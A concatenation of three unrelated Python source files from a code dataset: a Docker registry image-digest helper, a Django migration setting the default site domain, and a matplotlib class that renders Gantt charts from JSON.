"?service={}&scope=repository:{}:pull".format(
info["bearer"]["service"], repo), auth=auth_info, timeout=3)
res.raise_for_status()
return res.json()
return {}
def image_id_from_registry(image_name):
"""Get the docker id from a public or private registry"""
registry, repository, tag = parse(image_name)
res = None
try:
token = auth_token(registry, repository).get("token")
# dockerhub is crazy
if registry == "index.docker.io":
registry = "registry-1.docker.io"
res = requests.head("https://{}/v2/{}/manifests/{}".format(registry, repository, tag), headers={
"Authorization": "Bearer {}".format(token),
"Accept": "application/vnd.docker.distribution.manifest.v2+json"
}, timeout=5)
res.raise_for_status()
except requests.RequestException:
log.error("Received {} when attempting to get digest for {}".format(
res, image_name))
return None
return "@".join([registry+"/"+repository, res.headers["Docker-Content-Digest"]])
def image_id(image_name):
"""Retreve the image id from the local docker daemon or remote registry"""
if "@sha256:" in image_name:
return image_name
else:
return shell(['inspect', image_name, '--format', '{{index .RepoDigests 0}}']) or image_id_from_registry(image_name)
|
the-stack_106_15945
|
from django.conf import settings
from django.db import migrations
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.db.migrations.state import StateApps
def update_default_site(apps: StateApps, schema_editor: BaseDatabaseSchemaEditor):
Site = apps.get_model('sites', 'Site') # noqa: N806
# A default site object may or may not exist.
# If this is a brand-new database, the post_migrate will not fire until the very end of the
# "migrate" command, so the sites app will not have created a default site object yet.
# If this is an existing database, the sites app will likely have created an default site
# object already.
Site.objects.update_or_create(
pk=settings.SITE_ID, defaults={'domain': 'api.isic-archive.com', 'name': 'ISIC Archive'}
)
def rollback_default_site(apps: StateApps, schema_editor: BaseDatabaseSchemaEditor):
Site = apps.get_model('sites', 'Site') # noqa: N806
# This is the initial value of the default site object, as populated by the sites app.
# If it doesn't exist for some reason, there is nothing to roll back.
Site.objects.filter(pk=settings.SITE_ID).update(domain='example.com', name='example.com')
class Migration(migrations.Migration):
dependencies = [
# This is the final sites app migration
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.RunPython(update_default_site, rollback_default_site),
]
|
the-stack_106_15946
|
#!/usr/bin/env python
# pylint: disable=R0902, R0903, C0103
"""
Gantt.py is a simple class to render Gantt charts, as commonly used in
"""
import os
import json
import platform
from operator import sub
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import rc
# TeX support: on Linux assume TeX in /usr/bin, on OSX check for texlive
if (platform.system() == 'Darwin') and 'tex' in os.getenv("PATH"):
LATEX = True
elif (platform.system() == 'Linux') and os.path.isfile('/usr/bin/latex'):
LATEX = True
else:
LATEX = False
# setup pyplot w/ tex support
if LATEX:
rc('text', usetex=True)
class Package():
"""Encapsulation of a work package
A work package is instantiated from a dictionary. It **has to have**
a label, astart and an end. Optionally it may contain milestones
and a color
:arg str pkg: dictionary w/ package data name
"""
def __init__(self, pkg):
DEFCOLOR = "#32AEE0"
self.label = pkg['label']
self.start = pkg['start']
self.end = pkg['end']
if self.start < 0 or self.end < 0:
raise ValueError("Package cannot begin at t < 0")
if self.start > self.end:
raise ValueError("Cannot end before started")
try:
self.milestones = pkg['milestones']
except KeyError:
pass
try:
self.color = pkg['color']
except KeyError:
self.color = DEFCOLOR
try:
self.legend = pkg['legend']
except KeyError:
self.legend = None
class Gantt():
"""Gantt
Class to render a simple Gantt chart, with optional milestones
"""
def __init__(self, dataFile):
""" Instantiation
Create a new Gantt using the data in the file provided
or the sample data that came along with the script
:arg str dataFile: file holding Gantt data
"""
self.dataFile = dataFile
# some lists needed
self.packages = []
self.labels = []
self._loadData()
self._procData()
def _loadData(self):
""" Load data from a JSON file that has to have the keys:
packages & title. Packages is an array of objects with
a label, start and end property and optional milesstones
and color specs.
"""
# load data
with open(self.dataFile) as fh:
data = json.load(fh)
# must-haves
self.title = data['title']
for pkg in data['packages']:
self.packages.append(Package(pkg))
self.labels = [pkg['label'] for pkg in data['packages']]
# optionals
self.milestones = {}
for pkg in self.packages:
try:
self.milestones[pkg.label] = pkg.milestones
except AttributeError:
pass
try:
self.xlabel = data['xlabel']
except KeyError:
self.xlabel = ""
try:
self.xticks = data['xticks']
except KeyError:
self.xticks = ""
def _procData(self):
""" Process data to have all values needed for plotting
"""
# parameters for bars
self.nPackages = len(self.labels)
self.start = [None] * self.nPackages
self.end = [None] * self.nPackages
for pkg in self.packages:
idx = self.labels.index(pkg.label)
self.start[idx] = pkg.start
self.end[idx] = pkg.end
self.durations = map(sub, self.end, self.start)
self.yPos = np.arange(self.nPackages, 0, -1)
def format(self):
""" Format various aspect of the plot, such as labels,ticks, BBox
:todo: Refactor to use a settings object
"""
# format axis
plt.tick_params(
axis='both', # format x and y
which='both', # major and minor ticks affected
bottom='on', # bottom edge ticks are on
top='off', # top, left and right edge ticks are off
left='off',
right='off')
# tighten axis but give a little room from bar height
plt.xlim(0, max(self.end))
plt.ylim(0.5, self.nPackages + .5)
# add title and package names
plt.yticks(self.yPos, self.labels)
plt.title(self.title)
if self.xlabel:
plt.xlabel(self.xlabel)
if self.xticks:
plt.xticks(self.xticks, map(str, self.xticks))
def add_milestones(self):
"""Add milestones to GANTT chart.
The milestones are simple yellow diamonds
"""
if not self.milestones:
return
x = []
y = []
for key in self.milestones.keys():
for value in self.milestones[key]:
y += [self.yPos[self.labels.index(key)]]
x += [value]
plt.scatter(x, y, s=50, marker="^",
color="red", edgecolor="black", zorder=3)
def add_legend(self):
"""Add a legend to the plot iff there are legend entries in
the package definitions
"""
cnt = 0
for pkg in self.packages:
if pkg.legend:
cnt += 1
idx = self.labels.index(pkg.label)
self.barlist[idx].set_label(pkg.legend)
if cnt > 0:
self.legend = self.ax.legend(
shadow=False, ncol=3, fontsize="medium")
def render(self):
""" Prepare data for plotting
"""
# init figure
self.fig, self.ax = plt.subplots()
self.ax.yaxis.grid(False)
self.ax.xaxis.grid(True)
# assemble colors
colors = []
for pkg in self.packages:
colors.append(pkg.color)
self.barlist = plt.barh(self.yPos, list(self.durations),
left=self.start,
align='center',
height=.5,
alpha=1,
color=colors)
# format plot
self.format()
self.add_milestones()
self.add_legend()
@staticmethod
def show():
""" Show the plot
"""
plt.show()
@staticmethod
def save(saveFile='img/GANTT.png'):
""" Save the plot to a file. It defaults to `img/GANTT.png`.
:arg str saveFile: file to save to
"""
plt.savefig(saveFile, bbox_inches='tight')
if __name__ == '__main__':
g = Gantt('sample.json')
g.render()
g.show()
# g.save('img/GANTT.png')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.